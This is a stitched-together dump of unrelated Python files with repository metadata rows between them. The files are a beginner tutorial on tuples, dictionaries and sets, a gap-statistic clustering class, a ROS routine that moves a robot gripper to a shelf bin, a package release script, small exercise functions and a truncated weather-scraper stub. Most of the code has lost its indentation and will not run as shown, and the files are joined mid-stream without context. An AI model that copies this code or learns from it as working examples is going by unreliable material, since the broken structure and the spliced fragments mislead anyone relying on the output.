name , age, city = my_tuple
print(f"{name} {age} {city}")
my_tuple = (0, 1, 2, 3, 4)
i1, *i2, i3 = my_tuple
print(i1) # First item
print(i3) # Last item
print(i2) # all of elements left between
import sys
my_list = [0, 1, 2, "hello", True]
my_tuple = (0, 1, 2, "hello", True) ## Tuple is more faster than List
print(sys.getsizeof(my_list), "bytes")
print(sys.getsizeof(my_tuple), "bytes")
import timeit
print(timeit.timeit(stmt="[0,1,2,3,4,5]", number=1000000)) #0.062963041s
print(timeit.timeit(stmt="(0,1,2,3,4,5)", number=1000000)) #0.007387499999999991
##################################################### Dictionarnies
mdict = {'name': 'Max', "age": 28, "City": "New York"}
print(mdict)
mdict2 = dict(name="Mary", age=27, city="New York")
print(mdict2)
print(type(mdict2))
value = mdict["name"]
print(value)
mdict["email"] = "max@xyz.com"
print(mdict)
print(id(mdict["email"]))
mdict["email"] = "coolmax@xyz.com"
print(mdict)
print(id(mdict["email"]))
del mdict["name"]
print(mdict)
mdict.pop("age")
print(mdict)
mdict.popitem()
print(mdict)
if "City" in mdict:
print(mdict["City"])
print("Hey")
try:
print(mdict["name"])
except:
print("Error")
mdict = {'name': 'Max', "age": 28, "City": "New York"}
for key in mdict.keys():
print(key)
for key in mdict.values():
print(key)
for key, value in mdict.items():
print(key, value)
mdict_cpy = mdict # Assign as a pointer in the same address in memory
print(mdict_cpy is mdict)
# Merge Dictionaries
mdict = {"name":"Max", "age": 28, "email": "max@xyz.com"}
mdict2 = dict(name="Mary", age=27, city="Boston")
mdict.update(mdict2)
print(mdict)
mdict = {3:9 , 6:36, 9:81}
print(mdict)
value = mdict[3]
print(value)
mytuple = (8, 7)
mdict = {mytuple: 15}
print(mdict)
##################################################### SETs
myset = {1, 2, 3}
print(myset)
print(type(myset))
myset = set("Hello")
print(type(myset))
myset.add(1)
myset.add(2)
myset.add(3)
print(myset)
myset.discard("H")
print(myset)
print(myset.pop())
print(myset)
for x in myset:
print(x)
if 2 in myset:
print("YES")
# -----------------------------
odds = {1, 3, 5, 7, 9}
evens = {0, 2, 4, 6, 8}
primes = {2, 3, 5, 7}
u = odds.union(evens)
print(u)
print(id(u))
u = odds.intersection(primes)
print(u)
print(id(u))
setA = {1,2,3,4,5,6,7,8,9}
setB = {1,2,3,10,11,12}
diff = setA.difference(setB)
print(diff)
diff = setB.difference(setA)
print(diff)
diff = setB.symmetric_difference(setA) # Not in intersect of A & B
print(diff)
setA.update(setB) # Add new elements from setB without duplication
print(setA)
setA = {1,2,3,4,5,6,7,8,9}
setB = {1,2,3,10,11,12}
setA.intersection_update(setB)
print(setA)
setA = {1,2,3}
setB = {1,2,3,10,11,12}
print(setA.issubset(setB)) # is all elements on setA are in setB ?
print(setB.issubset(setA))
setC = {7,8}
print(setB.issuperset(setA))
print(setA.isdisjoint(setC))
setA = {1,2,3,4,5,6}
setB = setA.copy()
setB = set(setA)
print(id(setA))
print(id(setB))
print(setA)
print(setB)
# -----------------------------
a = frozenset([1,2,3,4])
# a.add(2)
print(type(a))
print(a)
| [
"puttipong.pua@gmail.com"
] | puttipong.pua@gmail.com |
c2a6c7801f3547946b38492ef118dd975aae1772 | e6c17803c9f60dbeafa7e866d7e108a3239d799d | /what_the_cluster/GapStat.py | 1f928a08083bccde57f61c9a8b280bc201d89c3b | [] | no_license | idc9/what_the_cluster | e6cf04730e224625a0bce21f7a9730a4984d54bd | 50f024e214cf6f4f4f976ac104d50a0c9a7a6d94 | refs/heads/master | 2020-03-11T17:46:27.297370 | 2018-09-19T21:53:59 | 2018-09-19T21:53:59 | 130,156,780 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 16,107 | py | from math import sqrt
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
from sklearn.externals import joblib
from scipy.sparse import issparse
from what_the_cluster.gapstat_utils import get_pooled_wcss, estimate_n_clusters
from what_the_cluster.reference_dists import sample_svd_null, sample_uniform_null
from what_the_cluster.utils import _is_strictly_increasing, _count_none, svd_wrapper
from what_the_cluster.clusterers import get_clusterer
# TODO: implement seeds
# TODO: give clusterer the option to return additional data
# TODO: give user the ability to input pre-sampled reference distributions
class GapStat(object):
def __init__(self,
clusterer='kmeans',
clusterer_kwargs={},
cluster_sizes=list(range(1, 11)),
ref_dist='uniform',
B=10,
gap_est_method='Tibs2001SEmax'):
"""
For details see Estimating the Number of Clusters in a Data Set via
the Gap Statistic by R. Tibshirani, G. Walther and T. Hastie, 2001.
Parameters
----------
clusterer (str, function): a function which computes clusters.
If clusterer is a string, the will used one of the pre-implemented
clustering algorithms from clusterers.py. Available options include
['kmeans']
If clusterer is a function then it should accpet two argumets:
(X, n_clusters) where X is the data set to cluster and n_clusters
is the number of desired clusters to estimate. This function should
return a list of estimated clusters for each observation.
clusterer_kwargs (None, dict): dict of key word arguments for the
clusterer function. See the documentation for the orignal functions
for available arguments (linked to in clusterers.py)
Warning: these are only applied for the
pre-implemented clusterers i.e. if clusterer is a string.
cluster_sizes (list): list of n_clusters to evaluate. Must be
strictly increasing.
ref_dist (str): which null reference distribution to use. Either
['uniform', 'svd']. 'uniform' will draw uniform smaples
from a box which has the same range of the data. 'PCA' will
use the prinicpal components to better adapt the shape of
the reference distribution to the observed data set.
See (Tibshirani et al, 2001) for details.
B (int): number of samples of null reference set to draw to estimated
the E log(W)
gap_est_method (str): how to select the local max using the gap
statistic. Currently one of ['firstmax', 'globalmax',
'Tibs2001SEmax']. See estimate_n_clusters() for details.
"""
assert ref_dist in ['uniform', 'svd']
assert _is_strictly_increasing(cluster_sizes)
self.ref_dist = ref_dist
self.B = B
self.cluster_sizes = cluster_sizes
self.gap_est_method = gap_est_method
if callable(clusterer):
# there might be an issue with python 3.x for x <2
# see https://stackoverflow.com/questions/624926/how-do-i-detect-whether-a-python-variable-is-a-function
self.clusterer_name = 'custom'
self.clusterer = clusterer
if clusterer_kwargs is not None:
# TODO: make this a proper Warning
print("WARNING: clusterer_kwargs is only use for pre-implemented clusterers")
else:
self.clusterer_name = clusterer
if clusterer == 'custom':
# this means we are loading a saved version of this object
# and we didn't save the clusterer funciton which should be
# saved separately
self.clusterer = None
else:
self.clusterer = get_clusterer(clusterer, clusterer_kwargs)
# only store this in case we save this object to disk
self.clusterer_kwargs = clusterer_kwargs
# these attributes will be set later
# self.X = None # observed data
# self.U = None # U, D, V are SVD of X
# self.D = None
# self.V = None
# self.obs_cluster_labels = None
# self.obs_wcss = None
# self.null_wcss_samples = None
# self.est_n_clusters = None
# self.possible_n_clusters = None
# self.metadata = {}
def get_params(self):
return {'clusterer': self.clusterer,
'clusterer_kwargs': self.clusterer_kwargs,
'cluster_sizes': self.cluster_sizes,
'ref_dist': self.ref_dist,
'B': self.B,
'gap_est_method': self.gap_est_method}
def fit(self, X, cluster_labels=None,
U=None, D=None, V=None):
"""
Estimates the number of clusters using the gap statistic.
Parameters
----------
X (matrix): the observed data with observations on the rows.
cluster_labels (None or matrix, observations x len(cluster_sizes)): matrix
containing the observed cluster labels on the columns for each
value of n_clusters.
If None then will uses clusterer to estimate the number of clusters
using the provided clusterer
U, D, V: the precomputed SVD of X see set_svd_decomposition() for
details. These are only used if ref_dist = 'svd'. If they are not
provided then will compute them.
"""
if type(X) == pd.DataFrame:
self.var_names = np.array(X.columns)
else:
self.var_names = np.array(range(X.shape[1]))
if not issparse(X):
X = np.array(X)
if cluster_labels is None:
cluster_labels = self.compute_obs_clusters(X)
assert cluster_labels.shape == (X.shape[0], len(self.cluster_sizes))
if self.ref_dist == 'svd':
if _count_none(U, D, V) == 3:
U, D, V = svd_wrapper(X)
elif _count_none(U, D, V) != 0:
raise ValueError('U, D, V must all be provided or be set to None')
self.obs_wcss = self.compute_obs_wcss(X, cluster_labels)
self.null_wcss_samples = self.sample_ref_null_wcss(X, U=U, D=D, V=V)
self.compute_n_cluster_estimate(method=self.gap_est_method)
return self
    @property
    def est_cluster_memberships(self):
        """
        Returns the estimated cluster memberships, i.e. the observed cluster
        label of each observation for the estimated number of clusters.

        Requires that self.est_n_clusters and self.obs_cluster_labels have
        been populated.
        """
        assert self.est_n_clusters is not None
        # index of est_n_clusters within cluster_sizes = column of the
        # observed-label matrix to return
        est_cluster_size_ind = np.where(
            np.array(self.cluster_sizes) == self.est_n_clusters)[0][0]
        return self.obs_cluster_labels[:, est_cluster_size_ind]
def compute_obs_clusters(self, X):
obs_cluster_labels = np.zeros((X.shape[0], len(self.cluster_sizes)))
for i, n_clusters in enumerate(self.cluster_sizes):
obs_cluster_labels[:, i] = self.clusterer(X, n_clusters)
return obs_cluster_labels
def compute_obs_wcss(self, X, obs_cluster_labels):
"""
Computes the within class sum of squres for the observed clusters.
"""
n_cluster_sizes = len(self.cluster_sizes)
obs_wcss = np.zeros(n_cluster_sizes)
for j in range(n_cluster_sizes):
# make sure the number of unique cluster labels is equal to
# the preported number of clusters
# TODO: we might not want this restrictin
assert len(set(obs_cluster_labels[:, j])) \
== self.cluster_sizes[j]
obs_wcss[j] = get_pooled_wcss(X, obs_cluster_labels[:, j])
return obs_wcss
def sample_null_reference(self, X, U=None, D=None, V=None):
if self.ref_dist == 'uniform':
return sample_uniform_null(X)
elif self.ref_dist == 'svd':
return sample_svd_null(X, U, D, V)
def sample_ref_null_wcss(self, X, U=None, D=None, V=None):
null_wcss_samples = np.zeros((len(self.cluster_sizes), self.B))
for b in range(self.B):
# sample null reference distribution
X_null = self.sample_null_reference(X, U=U, D=D, V=V)
# cluster X_null for the specified n_clusters
for i, n_clusters in enumerate(self.cluster_sizes):
# cluster. null sample
null_cluster_labels = self.clusterer(X_null, n_clusters)
null_wcss_samples[i, b] = get_pooled_wcss(X_null,
null_cluster_labels)
return null_wcss_samples
@property
def E_log_null_wcss_est(self):
"""
Estimate of the expected log(WCSS) of the null reference distribution
"""
assert self.null_wcss_samples is not None
return np.log(self.null_wcss_samples).mean(axis=1)
@property
def E_log_null_wcss_est_sd(self):
"""
Standard deviation of the estimated expected log(WCSS) from the null
distribuiton
"""
assert self.null_wcss_samples is not None
return np.std(np.log(self.null_wcss_samples), axis=1)
@property
def log_obs_wcss(self):
"""
log(WCSS) of the observed cluseters
"""
assert self.obs_wcss is not None
return np.log(self.obs_wcss)
@property
def gap(self):
"""
Returns the gap statistic i.e. E*(log(WCSS_null)) - log(WCSS_obs)
where E* means the estimated expected value
"""
assert self.obs_wcss is not None
return self.E_log_null_wcss_est - self.log_obs_wcss
@property
def adj_factor(self):
return sqrt(1.0 + (1.0/self.B))
def compute_n_cluster_estimate(self, method=None):
"""
Parameters
----------
method (str): which method to use to estimate the number of clusters.
Currently one of ['firstmax', 'globalmax', 'Tibs2001SEmax']
firstmax: finds the fist local max of f
globalmax: finds the global max of f
Tibs2001SEmax: uses the method detailed in (Tibshirani et al, 2001)
i.e. the first k (smallest number of clusters) such that
f[k] >= f[k + 1] - se[k + 1] * se_adj_factor
return_possibilities (bool): whether or not to also return the
other possible estimates
Output
------
est_n_clusters, possibilities
est_n_clusters: the estimated number of clustesr
possibilities: local maxima of the given method
"""
if method is None:
method = self.gap_est_method
est_n_clusters, possibilities = \
estimate_n_clusters(cluster_sizes=self.cluster_sizes,
f=self.gap,
se=self.E_log_null_wcss_est_sd,
se_adj_factor=self.adj_factor,
method=method)
self.gap_est_method = method
self.est_n_clusters = est_n_clusters
self.possible_n_clusters = possibilities
def plot_wcss_curves(self):
# plot observed log(WCSS)
plt.plot(self.cluster_sizes,
self.log_obs_wcss,
marker="$O$",
color='blue',
ls='solid',
label='obs')
# plot the expected log(WCSS) of the null references
plt.plot(self.cluster_sizes,
self.E_log_null_wcss_est,
marker='$E$',
color='red',
ls='dashed',
label='E null')
plt.xticks(self.cluster_sizes)
plt.xlabel('number of clusters')
plt.ylabel('log(WCSS)')
plt.legend()
def plot_gap(self, errorbars=True, include_est=True,
include_possibilities=False):
if errorbars:
# TODO: should we use s_adj for error bars?
plt.errorbar(self.cluster_sizes,
self.gap,
color='black',
yerr=self.E_log_null_wcss_est_sd)
else:
plt.plot(self.cluster_sizes,
self.gap,
color='black',
marker='x')
plt.xticks(self.cluster_sizes)
plt.xlabel('number of clusters')
plt.ylabel('gap')
# maybe include the estimated numer of clusters
if include_est:
plt.axvline(x=self.est_n_clusters, color='red',
label='estimated {} clusters'.
format(self.est_n_clusters))
# maybe include other possible estimates
if include_possibilities:
label = 'possibility'
for n in self.possible_n_clusters:
if n == self.est_n_clusters:
continue
plt.axvline(x=n, color='blue', ls='dashed', lw=1, label=label)
label = '' # HACK: get only one 'possibility' label to show up
plt.legend()
def save(self, fname, compress=True, include_data=False):
# save_dict = {'ref_dist': self.ref_dist,
# 'B': self.B,
# 'cluster_sizes': self.cluster_sizes,
# 'gap_est_method': self.gap_est_method,
# 'clusterer_name': self.clusterer_name,
# 'clusterer_kwargs': self.clusterer_kwargs,
# 'obs_cluster_labels': self.obs_cluster_labels,
# 'obs_wcss': self.obs_wcss,
# 'null_wcss_samples': self.null_wcss_samples,
# 'est_n_clusters': self.est_n_clusters,
# 'possible_n_clusters': self.possible_n_clusters,
# 'metadata': self.metadata}
# if include_data:
# save_dict['X'] = self.X
# save_dict['U'] = self.U
# save_dict['D'] = self.D
# save_dict['V'] = self.V
# else:
# save_dict['X'] = None
# save_dict['U'] = None
# save_dict['D'] = None
# save_dict['V'] = None
joblib.dump(self,
filename=fname,
compress=compress)
# @classmethod
# def load_from_dict(cls, load_dict):
# # initialize class
# GS = cls(clusterer=load_dict['clusterer_name'],
# clusterer_kwargs=load_dict['clusterer_kwargs'],
# cluster_sizes=load_dict['cluster_sizes'],
# ref_dist=load_dict['ref_dist'],
# B=load_dict['B'],
# gap_est_method=load_dict['gap_est_method'])
# GS.obs_cluster_labels = load_dict['obs_cluster_labels']
# GS.obs_wcss = load_dict['obs_wcss']
# GS.null_wcss_samples = load_dict['null_wcss_samples']
# GS.est_n_clusters = load_dict['est_n_clusters']
# GS.possible_n_clusters = load_dict['possible_n_clusters']
# GS.X = load_dict['X']
# GS.U = load_dict['U']
# GS.D = load_dict['D']
# GS.V = load_dict['B']
# GS.metadata = load_dict['metadata']
# return GS
@classmethod
def load(cls, fname):
# load_dict = joblib.load(fname)
# return cls.load_from_dict(load_dict)
return joblib.load(fname)
@classmethod
def from_precomputed_wcss(cls, cluster_sizes, obs_wcss,
null_wcss_samples, **kwargs):
"""
Initializes GatStat object form precomputed obs_wcss and
null_wcss_smaples.
"""
assert len(obs_wcss) == len(cluster_sizes)
assert null_wcss_samples.shape[0] == len(cluster_sizes)
GS = cls(cluster_sizes=cluster_sizes, **kwargs)
GS.obs_wcss = obs_wcss
GS.null_wcss_samples = null_wcss_samples
GS.B = null_wcss_samples.shape[1] # NOTE: B may be differnt
GS.compute_n_cluster_estimate()
return GS
| [
"idc9@cornell.edu"
] | idc9@cornell.edu |
3514d2984f6184d63ccc6c01b4f10585b59cc95b | 72e0acb6b622a115f43259d21898578722478050 | /catkin_ws/src/apc_planning/src/goToMouth.py | cbd4c15de45517cebd2eb2595afc4736754a63b4 | [
"MIT"
] | permissive | LinuXperia/team_mit | d046bee98e0629b14eb0fb0fb32c839b0bc07c00 | 207c0df56fbe4f4e713c7fcab99f508e29d77bf2 | refs/heads/master | 2021-05-31T20:24:46.679180 | 2016-04-22T01:58:53 | 2016-04-22T01:58:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,616 | py | #!/usr/bin/env python
# goToMouth primitive:
# description:
# called when we want to go to mouth of bin, BE VERY CAREFUL IF CALLED INCORRECTLY
# OR AT A BAD TIME IT MAY HIT THE CAMERAS OR THE SHELF, designed to be used
# from home or from the objective bin, not when hand is inside the bin
# the robot moves in essentially a straight line from where it is to the home
# tcp pose (position is taken as argument, pose is assumed to be gripper open
# toward shelf)
# inputs:
# configuration of the robot when called, assumed to be at the mouth bin or
# at objective bin
# location of the home, xyz in world coordinate frame and orientation, this
# is subject to change
import geometry_msgs.msg
import std_msgs
import json
import tf
from ik.roshelper import ROS_Wait_For_Msg
from ik.ik import IK
import rospy
import pdb
import numpy as np
import math
import tf.transformations as tfm
import gripper
# put shared function into ik.helper module
from ik.helper import getBinMouthAndFloor
from ik.roshelper import coordinateFrameTransform
from ik.helper import pauseFunc
from ik.helper import visualizeFunc
from ik.helper import getObjCOM
from ik.helper import openGripper
from ik.helper import closeGripper
from ik.roshelper import pubFrame
def goToMouth(robotConfig = None,
              binNum = 0,
              isExecute = True,
              withPause = False):
    '''Move the gripper TCP in a straight line to the mouth of bin `binNum`.

    WARNING (from the file header): only call this from home or from the
    objective bin -- never while the hand is inside a bin, or the robot may
    hit the shelf or the cameras.

    robotConfig: current robot configuration when called; passed to the IK
        planner as the initial configuration.
    binNum: index of the target bin on the shelf.
    isExecute: if True the computed plan is executed on the robot.
    withPause: if True, wait for user confirmation before executing.

    Returns the plan on success, or None if planning failed.
    '''
    joint_topic = '/joint_states'

    ## initialize ROS tf listener and broadcaster
    listener = tf.TransformListener()
    rospy.sleep(0.1)
    br = tf.TransformBroadcaster()
    rospy.sleep(0.1)

    # plan store
    plans = []

    ## initial variable and tcp definitions
    # set tcp: the tool center point sits l2 meters along link_6
    l2 = 0.47
    tip_hand_transform = [0, 0, l2, 0,0,0] # to be updated when we have a hand design finalized
    # broadcast frame attached to tcp
    pubFrame(br, pose=tip_hand_transform, frame_id='tip', parent_frame_id='link_6', npub=5)
    # get position of the tcp in world frame
    pose_world = coordinateFrameTransform(tip_hand_transform[0:3], 'link_6', 'map', listener)
    tcpPos=[pose_world.pose.position.x, pose_world.pose.position.y, pose_world.pose.position.z]
    tcpPosHome = tcpPos
    # set home orientation (gripper open toward the shelf, per header comment)
    gripperOri = [0, 0.7071, 0, 0.7071]

    # target: a point distFromShelf meters in front of the mouth of the bin,
    # converted from the shelf frame into the world frame
    distFromShelf = 0.15
    mouthPt,temp = getBinMouthAndFloor(distFromShelf, binNum)
    mouthPt = coordinateFrameTransform(mouthPt, 'shelf', 'map', listener)
    targetPosition = [mouthPt.pose.position.x, mouthPt.pose.position.y, mouthPt.pose.position.z]

    # plan a path from the current configuration to the target tip pose
    q_initial = robotConfig
    planner = IK(q0 = q_initial, target_tip_pos = targetPosition, target_tip_ori = gripperOri, tip_hand_transform=tip_hand_transform, joint_topic=joint_topic)
    plan = planner.plan()
    s = plan.success()
    if s:
        print '[goToMouth] move to bin mouth successful'
        plan.visualize()
        plans.append(plan)
        if isExecute:
            # optionally wait for the user before moving the real robot
            pauseFunc(withPause)
            plan.execute()
    else:
        print '[goToMouth] move to bin mouth fail'
        return None

    qf = plan.q_traj[-1]

    ## open gripper fully
    openGripper()

    return plan
if __name__=='__main__':
rospy.init_node('listener', anonymous=True)
goToMouth(robotConfig=None,
binNum = 0,
isExecute = True,
withPause = False)
# objPose = [1.60593056679, 0.29076179862, 0.863177359104], binNum = 3
# objPose = [1.55620419979, 0.281148612499, 1.14214038849], binNum = 0,
# obJPose = [1.62570548058, 0.289612442255, 0.648919522762], binNum = 6,
| [
"peterkty@gmail.com"
] | peterkty@gmail.com |
7cc5e26b3b002ea59b7a91392cf6ad2b4d9042bb | 12b5584956797fcb0f48e7971bc074ae13a37489 | /pySpatialTools/release.py | b4439a5b0eb2c44ff32c36629289ad36af5e241a | [
"MIT"
] | permissive | tgquintela/pySpatialTools | a0ef5b032310aa1c140e805f4ee8c4a40fd2d10e | e028008f9750521bf7d311f7cd3323c88d621ea4 | refs/heads/master | 2020-05-21T22:09:08.858084 | 2017-02-10T11:18:41 | 2017-02-10T11:18:41 | 39,067,763 | 8 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,919 | py | """Release data for pySpatialTools.
The information of the version is in the version.py file.
"""
from __future__ import absolute_import
import os
import sys
import time
import datetime
basedir = os.path.abspath(os.path.split(__file__)[0])
## Quantify the version
MAJOR = 0
MINOR = 0
MICRO = 0
ISRELEASED = False
VERSION = '%d.%d.%d' % (MAJOR, MINOR, MICRO)
QUALIFIER = ''
def write_version_py(filename=None):
    """Write a one-line version.py defining `version`.

    Parameters
    ----------
    filename: destination path. Defaults to
        <directory of this file>/pySpatialTools/version.py.

    Uses the module-level `version` string (computed by get_info() at the
    bottom of this file).
    """
    cnt = """\
version = '%s'
"""
    if not filename:
        filename = os.path.join(
            os.path.dirname(__file__), 'pySpatialTools', 'version.py')

    # `with` closes the file even if the write raises, replacing the
    # manual open / try / finally bookkeeping.
    with open(filename, 'w') as a:
        a.write(cnt % (version))
def write_versionfile():
"""Creates a static file containing version information."""
versionfile = os.path.join(basedir, 'version.py')
text = '''"""
Version information for pySpatialTools, created during installation by
setup.py.
Do not add this file to the repository.
"""
import datetime
version = %(version)r
date = %(date)r
# Development version
dev = %(dev)r
# Format: (name, major, minor, micro, revision)
version_info = %(version_info)r
# Format: a 'datetime.datetime' instance
date_info = %(date_info)r
# Format: (vcs, vcs_tuple)
vcs_info = %(vcs_info)r
'''
# Try to update all information
date, date_info, version, version_info, vcs_info = get_info(dynamic=True)
def writefile():
fh = open(versionfile, 'w')
subs = {
'dev': dev,
'version': version,
'version_info': version_info,
'date': date,
'date_info': date_info,
'vcs_info': vcs_info
}
fh.write(text % subs)
fh.close()
## Mercurial? Change that
if vcs_info[0] == 'mercurial':
# Then, we want to update version.py.
writefile()
else:
if os.path.isfile(versionfile):
# This is *good*, and the most likely place users will be when
# running setup.py. We do not want to overwrite version.py.
# Grab the version so that setup can use it.
sys.path.insert(0, basedir)
from version import version
del sys.path[0]
else:
# Then we write a new file.
writefile()
return version
def get_revision():
    """Returns revision and vcs information, dynamically obtained.

    Returns
    -------
    revision: currently always None (revisions are not extracted yet).
    vcs_info: tuple (vcs, (revision, tag)) where vcs is 'git' when a .git
        directory exists next to the package, else None.
    """
    vcs, revision, tag = None, None, None

    # Only git is detected. The previously-computed mercurial path (hgdir)
    # was a dead local -- assigned but never read -- and has been removed.
    gitdir = os.path.join(basedir, '..', '.git')

    if os.path.isdir(gitdir):
        vcs = 'git'
        # For now, we are not bothering with revision and tag.
    vcs_info = (vcs, (revision, tag))
    return revision, vcs_info
def get_info(dynamic=True):
## Date information
date_info = datetime.datetime.now()
date = time.asctime(date_info.timetuple())
revision, version, version_info, vcs_info = None, None, None, None
import_failed = False
dynamic_failed = False
if dynamic:
revision, vcs_info = get_revision()
if revision is None:
dynamic_failed = True
if dynamic_failed or not dynamic:
# All info should come from version.py. If it does not exist, then
# no vcs information will be provided.
sys.path.insert(0, basedir)
try:
from version import date, date_info, version, version_info,\
vcs_info
except ImportError:
import_failed = True
vcs_info = (None, (None, None))
else:
revision = vcs_info[1][0]
del sys.path[0]
if import_failed or (dynamic and not dynamic_failed):
# We are here if:
# we failed to determine static versioning info, or
# we successfully obtained dynamic revision info
version = ''.join([str(major), '.', str(minor), '.', str(micro)])
if dev:
version += '.dev_' + date_info.strftime("%Y%m%d%H%M%S")
version_info = (name, major, minor, micro, revision)
return date, date_info, version, version_info, vcs_info
## Version information
name = 'pySpatialTools'
major = "0"
minor = "0"
micro = "0"
## Declare current release as a development release.
## Change to False before tagging a release; then change back.
dev = True
description = """Python package for studying spatially irregular, heterogeneous
data."""
long_description = """
This package provides prototyping tools in Python to deal with spatial data
and to model spatially-derived relations between the different elements of a
system. In some systems -- due to the huge amount of data, the complexity of
their topology, their local nature, or other practical reasons -- we are
forced to use only local information to model the system properties and
dynamics.
pySpatialTools is useful for complex topological systems with different types
of spatial data elements and feature data elements, in which we are not able
to study them all at once because of the data size.
pySpatialTools may not be the best choice for problems with homogeneous
and/or regular data, which can be treated with other Python packages, for
example computational linguistics (nltk), computer vision or grid data
(scipy.ndimage and openCV).
"""
## Main author
author = 'T. Gonzalez Quintela',
author_email = 'tgq.spm@gmail.com',
license = 'MIT'
authors = {'tgquintela': ('T. Gonzalez Quintela', 'tgq.spm@gmail.com')}
maintainer = ""
maintainer_email = ""
url = ''
download_url = ''
platforms = ['Linux', 'Mac OSX', 'Windows', 'Unix']
keywords = ['math', 'data analysis', 'Mathematics', 'spatial networks',
'spatial correlations', 'framework', 'social sciences',
'spatial analysis', 'spatial ecology']
classifiers = [
# How mature is this project? Common values are
# 3 - Alpha
# 4 - Beta
# 5 - Production/Stable
'Development Status :: 3 - Alpha',
# Indicate who your project is intended for
'Intended Audience :: Developers',
'Intended Audience :: Science/Research',
# Pick your license as you wish (should match "license" above)
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
# Specify the Python versions you support here
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
# Topic information
'Topic :: Software Development :: Build Tools',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: Scientific/Engineering :: Sociology',
'Topic :: Scientific/Engineering :: Data Analysis',
'Topic :: Scientific/Engineering :: Information Analysis',
'Topic :: Scientific/Engineering :: Mathematics']
date, date_info, version, version_info, vcs_info = get_info()
if __name__ == '__main__':
# Write versionfile for nightly snapshots.
write_versionfile()
| [
"tgq.spm@gmail.com"
] | tgq.spm@gmail.com |
d45c4ffc146c63112aedd4bc8278ee99af91e288 | 434ff9cae19d550c7b14b6219064051b6430537a | /codes.py | 576a80c56a81c84c8b9cc08575dcf224a4e401b1 | [] | no_license | RicoSaeg/Hackademy | ca050b7699d9c08f69b47d971baa68e853e918a0 | 77cdd270e40feed5ca49a0f06f05b86f9f06821f | refs/heads/master | 2020-04-22T21:52:42.502530 | 2019-02-14T12:45:09 | 2019-02-14T12:45:09 | 170,688,102 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,195 | py | import os
a_list = []
def my_sum(a_list):
    """Return the sum of the numbers in *a_list* (0 for an empty list).

    Idiom fix: the hand-rolled accumulator loop is replaced by the
    builtin ``sum``, which has identical semantics.
    """
    return sum(a_list)
def my_prod(a_list):
    """Return the product of the numbers in *a_list* (1 for an empty list).

    Idiom fix: uses :func:`math.prod`, which matches the original loop
    exactly, including the empty-input result of 1.
    """
    # Local import: the file's top-level import block is not visible here.
    from math import prod
    return prod(a_list)
def my_count(a_list):
    """Return how many elements *a_list* yields.

    Works on any iterable (not just sized containers), like the
    original loop.
    """
    return sum(1 for _ in a_list)
def my_count_less_5(a_list):
    """Return how many values in *a_list* are strictly less than 5."""
    return sum(1 for value in a_list if value < 5)
def my_count_1(a_list):
    """Return how many values in *a_list* equal 1."""
    return sum(1 for value in a_list if value == 1)
def my_count_max(a_list):
    """Return the largest value in *a_list*, or 0 for an empty list.

    Bug fix: the original seeded its running maximum with 0, so a list
    containing only negative numbers wrongly returned 0 instead of its
    true maximum. ``max(..., default=0)`` fixes that while preserving
    the original empty-list result of 0.
    """
    return max(a_list, default=0)
def get_filename(a_dirname):
    """Return the entries of directory *a_dirname* as full paths.

    Side effect (kept from the original): prints the bare entry names.

    Raises whatever :func:`os.listdir` raises for a missing/unreadable
    directory (e.g. FileNotFoundError).
    """
    list_of_files = os.listdir(a_dirname)
    print("list of the file name: ")
    print(list_of_files)
    # Join each bare entry name with the directory to get a usable path.
    return [os.path.join(a_dirname, name) for name in list_of_files]
def flatten(a_list_with_lists):
    """Flatten one level of nesting: sub-lists are spliced in place.

    Non-list elements are kept as-is; deeper nesting is not recursed into.
    """
    result = []
    for element in a_list_with_lists:
        if isinstance(element, list):
            result.extend(element)
        else:
            result.append(element)
    return result
# Sample input for print_right below: scalars mixed with sub-lists.
list_in_list = [12,[3,4],36]
# Expected print_right output, one row per element:
#12
#3 4
#36
def print_right(a_list_with_lists):
    """Print each element on its own row; sub-list items share one row.

    Scalars are printed alone; for a sub-list the items are printed
    space-separated, followed by a trailing space and newline (the
    original's exact output format is preserved).
    """
    for element in a_list_with_lists:
        if not isinstance(element, list):
            print(element)
            continue
        for inner in element:
            print(inner, end=" ")
        print(" ")
def single_row_star(number):
    """Print *number* symbols on one line, alternating '*' and '/'.

    Even positions get '*', odd positions get '/', each followed by a
    space; no trailing newline is printed.
    """
    for position in range(number):
        symbol = "*" if position % 2 == 0 else "/"
        print(symbol, end=" ")
# NOTE(review): these module-level input() calls block whenever the file
# is imported or run; presumably leftover interactive experiments —
# confirm before removing. `a` raises ValueError on non-numeric input.
a = int(input("numb"))
b = input("hello")
def single_row_of(number, string):
    """Print *string* followed by a space, *number* times, on one line.

    No trailing newline is printed (matches the original's end=" " loop).
    """
    print((string + " ") * number, end="")
# list_by_two = []
def square_of_stars(num):
    """Print a num x num square of '*' characters.

    Each row is the asterisks followed by a space and a newline
    (identical to the original's inner loop plus ``print(" ")``).
    """
    for _row in range(num):
        print("*" * num + " ")
# Sample input for list_by_two below.
l = [2,3,4]
def list_by_two(list):
    """Return a new list with every element of *list* multiplied by two.

    Bug fix: the original called ``new_list.append()`` with no argument,
    which raised ``TypeError`` for any non-empty input. The function
    name and the sample list ``l`` above indicate doubling was intended.
    """
    # NOTE: the parameter name shadows the builtin ``list``; kept
    # unchanged for backward compatibility with keyword callers.
    return [n * 2 for n in list]
def list_opposite(a_list):
    """Return a new list with the elements of *a_list* in reverse order.

    The input list is not modified.
    """
    return a_list[::-1]
| [
"rico.saegesser@student.unisg.ch"
] | rico.saegesser@student.unisg.ch |
a4606d1d35ea11062dd647cbdad4961bf71aa3a5 | 64a5fc21e81f8372ec4593bf8d823c1e5aba0145 | /gadget/weather.py | 98fa40f0185818be1a2fe2f5dca7350d4b50bdf9 | [
"MIT"
] | permissive | LemuriaChen/gadget | 0c23aafab4c88914d5a74881dfef0ebbc9369bb4 | 93b51553a56655a31cfa8d90ac9f6a469775fb8f | refs/heads/master | 2021-01-16T01:26:18.411722 | 2020-02-25T06:16:40 | 2020-02-25T06:16:40 | 242,925,204 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 431 | py |
from urllib.request import urlopen
from bs4 import BeautifulSoup
# Fetch the Moji weather page for Haidian district, Beijing, and parse it.
